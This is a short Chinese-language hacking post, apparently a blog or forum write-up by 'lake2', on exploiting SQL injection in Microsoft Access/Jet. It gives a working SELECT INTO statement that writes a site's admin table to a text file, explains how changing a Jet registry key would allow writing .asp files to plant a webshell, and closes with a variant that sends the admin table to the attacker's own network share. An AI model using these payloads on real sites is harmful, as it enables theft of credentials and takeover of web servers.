by:lake2
已經(jīng)聽N個(gè)人過說有人已經(jīng)發(fā)現(xiàn)SQL注入Access得到webshell的技術(shù)了,也只是聽說而已,具體的細(xì)節(jié)還是不得而知。
最近在看的書中一章提到Jet的安全,然后靈光一閃,呵呵,發(fā)現(xiàn)了一種可以利用access導(dǎo)出asp的方法,分享之。
幾個(gè)月之前網(wǎng)上就流傳利用SQL注入Access導(dǎo)出數(shù)據(jù)庫內(nèi)容到文本文件(可導(dǎo)出txt、htm、html等格式)的方法:
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
執(zhí)行上述語句,在d:\web目錄下就會(huì)生成test.txt文件,其內(nèi)容就是表admin的內(nèi)容。但是導(dǎo)出asp格式就不行,會(huì)說“不能更新,數(shù)據(jù)庫或?qū)ο鬄橹蛔x”。
其實(shí)控制導(dǎo)出文件后綴是存儲(chǔ)在注冊表的,具體鍵值是HKEY_LOCALMACHINE\Software\Microsoft\Jet\4.0\Engines\Text\DisableExtension,默認(rèn)情況下值為“!txt,csv,tab,asc,tmp,htm,html”,如果我們把a(bǔ)sp也添加進(jìn)去的話,呵呵,就可以導(dǎo)出asp格式的文件了。
這個(gè)方法跟那個(gè)調(diào)用Access的Shell函數(shù)執(zhí)行命令一樣,要修改注冊表,所以利用不是很大。
順便提一下,前面提到的導(dǎo)出文本文件的方法如果不知道web路徑貌似可以導(dǎo)出到自己機(jī)器的哦:SELECT * into [test.txt] in '\\yourip\share' 'text;' from admin